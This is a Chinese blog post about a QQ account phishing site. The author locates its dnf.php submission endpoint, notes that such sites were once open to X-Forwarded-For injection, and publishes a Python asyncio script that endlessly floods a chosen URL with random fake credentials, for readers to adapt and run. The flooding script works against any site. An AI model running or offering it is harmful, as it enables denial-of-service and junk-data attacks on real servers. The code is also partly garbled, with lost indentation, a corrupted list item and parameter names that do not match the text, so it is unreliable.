今天在空间收到一条消息,大致如下。
好奇的扫了进去看了一下
妥妥的*号盗**网站,先不说域名问题。一眼就能看得出来。有些朋友可能知道它是*号盗**网站也拿他没办法,但是真的没办法嘛?当然有啦。之前这种就爆了x-forward注入,咋们就不说那么*力暴**的东西了。
进入正题,先看看它的接口是哪个文件,还有是哪种提交方式。
get提交方式,接口是dnf.php文件
接下来就是思路了
第一步,肯定得无限提交这个请求
第二步,得生成一些随机的账号密码
插入 "dnf.php"
设为 提交URL
插入 "GET"
设为 提交方法
插入 "u="
生成 QQ
插入 "&p="
生成 密码
编码为 URL
插入 "&tijiao=%E6%8F%90%CD%8F%CD%8F%CD%8F%CD%8F%E4%BA%A4"
合并
设为 提交内容
清空
思路有了接下来就是撸python了
import random
import string
import asyncio, aiohttp
import sys
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36'}
async def request(url, params):
async with aiohttp.ClientSession() as session:
async with session.get(url, params = params, headers=headers, timeout=1) as resp:
return [resp.status, await resp.text()]
async def once(url):
user1 = ''.join(random.sample(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'], 9))
pass1 = ''.join(random.sample(['0', '1', '2', '3', '4', '5', '6', '7', '8', '9'], 6))
pass2 = ''.join(random.sample(['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', 'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'z','x','c', 'v','b', 'n', 'm', 'Q', 'W', 'E', 'R', 'T', 'Y', 'U', 'I', 'O', 'P', 'A', 'S', 'D', 'F', 'G', 'H', 'J','K','L', 'Z','X', 'C', 'V', 'B', 'N', 'M'], 3))
pass3 = ''.join(random.sample(['!', '@', '#', '#39;, '%', '^', '&', '*', ',', '.', '/'], 2))
password = str(pass1) + str(pass2) + str(pass3)
params = {'user': user1, 'pass': password}
status, text = await request(url, params)
print(user1 + ':' + password + ' ' + str(status) + ' ' + str(text))
def main(url, n):
loop = asyncio.get_event_loop()
times = 0
while 1:
print('=' * 10)
try:
tasks = [once(url) for i in range(n)]
loop.run_until_complete(asyncio.wait(tasks))
times += n
print('times: ' + str(times))
except KeyboardInterrupt:
sys.exit()
except Exception:
sys.exit()
loop.close()
if __name__ == "__main__":
main('', 16)
一定要用python3运行,另外
params = {'user': user1, 'pass': password} main('', 16)
这个里面的参数看情况修改即可!
修行不易点个赞呗!